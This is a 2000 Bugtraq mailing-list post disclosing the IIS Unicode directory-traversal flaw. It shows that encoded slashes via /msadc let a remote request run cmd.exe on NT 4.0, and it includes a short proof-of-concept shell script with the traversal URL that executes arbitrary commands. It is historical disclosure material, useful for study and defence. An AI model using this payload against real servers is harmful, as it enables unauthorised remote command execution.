Bugtraq mailing list archives

%c1%1c NT remote execution, YES YOU CAN GET OUT OF DOCUMENT_ROOT_DRIVE!


From: Marco <m.v.berkum () obit nl>
Date: Fri, 20 Oct 2000 22:56:08 +0200

Hi,
A friend (Dimitri van de Giessen) called me after reading the article
regarding this remote execution UNICODE style bug in the IIS
webserver (supposedly >4.0) found by an anonymous packetstorm mailer
and investigated by RFP.

Again NT??!?

Yes... again...
I called in another friend (Kristian Vlaardingerbroek) to eat a lot and
to help me find out this funny bug.
We started investigating and after a while we found that rain forest
puppy's string "%c1%af" worked on our english version of NT 4.0.
Playing a bit, feeling tired, we found that you CAN get out of the
document_root_drive to execute cmd.exe.

Remember the msadc RDS "feature" ?

Ok, so why not use /msadc ? It's a directory placed on the system drive
and usually accessible through normal HTTP requests.
Knowing this you would know that putting the website on a different
drive than your system drive would not make a difference at all ;)
You can put it on a Q:\> if you like, you're still possibly
vulnerable.
Imagine what you could do with this:

----blaat.sh----
#!/bin/sh
lynx -dump http://$1/msadc/..\%c0\%af../..\%c0\%af../..\%c0\%af../winnt/system32/cmd.exe\?/c\+$2+$3+$4+$5+$6+$7

--------------
./blaat.sh www.yourownmachine.com dir c:\\ <- you need the double
backslash to escape it.

And voila, a dir listing.
It seems that every different language version of NT has different
UNICODE chars, didn't find out other countries yet, will be easy to make
in perl as RFP described (not going to give you source code either ;-)).

Most probably sample files like pagevieuw and codebrws.asp, other iis
samples and other "features" like msadc, webhits, newdsn and +.htr
(%2B) get interesting AGAIN when placed on other dirs viewable by the
dir c:\\anything command. Get blisters patching your NT.

Now you can execute commands, welcome to the amazing world of Microsoft(TM).

Cheers,
Marco van Berkum, Dimitri van de Giessen, Kristian Vlaardingerbroek.

Marco    - www.obit.nl (marco () obit nl) http://www.britney.com
Dimitri   - www.IS-Watch.nl (info () IS-Watch nl)
http://www.is-watch.nl/microsoft.jpg ;)
Kristian -  www.obit.nl (kris () obit nl) http://www.slashdot.org

